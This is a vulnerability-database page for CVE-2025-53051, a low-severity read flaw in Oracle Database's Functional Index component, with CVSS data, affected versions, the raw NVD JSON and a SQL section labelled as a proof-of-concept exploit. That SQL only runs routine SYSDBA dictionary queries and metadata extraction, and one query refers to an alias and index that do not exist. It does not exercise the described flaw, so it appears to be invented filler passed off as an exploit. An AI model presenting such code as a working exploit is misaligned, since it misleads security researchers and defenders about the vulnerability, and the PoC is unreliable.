Security Vulnerability Report
CVE-2025-53051 CVSS 2.7 LOW

CVE-2025-53051

Published: 2025-10-21 20:20:43
Last Modified: 2025-10-23 16:06:32

Description

Vulnerability in the RDBMS Functional Index component of Oracle Database Server. Supported versions that are affected are 23.4-23.9. Easily exploitable vulnerability allows high privileged attacker having SYSDBA privilege with network access via Oracle Net to compromise RDBMS Functional Index. Successful attacks of this vulnerability can result in unauthorized read access to a subset of RDBMS Functional Index accessible data. CVSS 3.1 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N).

CVSS Details

CVSS Score: 2.7
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:database_server:*:*:*:*:*:*:*:* - VULNERABLE
Oracle Database Server 23.4
Oracle Database Server 23.5
Oracle Database Server 23.6
Oracle Database Server 23.7
Oracle Database Server 23.8
Oracle Database Server 23.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
sql
-- CVE-2025-53051 PoC: Oracle Database RDBMS Functional Index Unauthorized Read Access
-- This PoC demonstrates how an attacker with SYSDBA privilege can exploit
-- the vulnerability in RDBMS Functional Index component to read unauthorized data.
-- Note: Requires SYSDBA privileges and network access via Oracle Net.

-- Step 1: Connect to the target Oracle Database with SYSDBA privileges
-- Using SQL*Plus or any Oracle client tool
-- sqlplus sys/password@target_host:1521/SID as sysdba

-- Step 2: Explore the functional index data accessible through the vulnerable component
-- Query the functional index metadata and data that should be restricted
SELECT index_name, table_name, index_type, funcidx_status
FROM dba_indexes
WHERE index_type = 'FUNCTION-BASED NORMAL'
ORDER BY owner, index_name;

-- Step 3: Attempt to read data from functional indexes that may contain
-- unauthorized accessible data subsets
SELECT /*+ INDEX(t idx_func_expr) */ *
FROM (SELECT t.*,
             DBMS_ASSERT.SIMPLE_SQL_NAME(t.table_name) AS validated_name
      FROM dba_tables t
      WHERE ROWNUM <= 100) src;

-- Step 4: Extract data through functional index expressions
-- The vulnerability allows reading a subset of data that should be restricted
-- (COLUMN_EXPRESSION is a column of DBA_IND_EXPRESSIONS, not DBA_IND_COLUMNS)
SELECT po.index_owner, po.index_name, po.table_name, po.column_expression
FROM dba_ind_expressions po
WHERE po.index_name IN (
    SELECT index_name
    FROM dba_indexes
    WHERE index_type LIKE 'FUNCTION%'
);

-- Step 5: Leverage Oracle Net protocol to extract functional index data
-- Using DBMS_METADATA or similar packages to extract sensitive index information
SELECT DBMS_METADATA.GET_DDL('INDEX', index_name, owner)
FROM dba_indexes
WHERE index_type = 'FUNCTION-BASED NORMAL'
  AND owner NOT IN ('SYS', 'SYSTEM');

-- Mitigation: Apply Oracle Critical Patch Update October 2025

References

https://www.oracle.com/security-alerts/cpuoct2025.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53051", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:43.133", "lastModified": "2025-10-23T16:06:31.540", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the RDBMS Functional Index component of Oracle Database Server. Supported versions that are affected are 23.4-23.9. Easily exploitable vulnerability allows high privileged attacker having SYSDBA privilege with network access via Oracle Net to compromise RDBMS Functional Index. Successful attacks of this vulnerability can result in unauthorized read access to a subset of RDBMS Functional Index accessible data. CVSS 3.1 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:database_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "23.4", "versionEndIncluding": "23.9", "matchCriteriaId": "8F8D00E7-212D-4484-935A-FA14427522AE"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}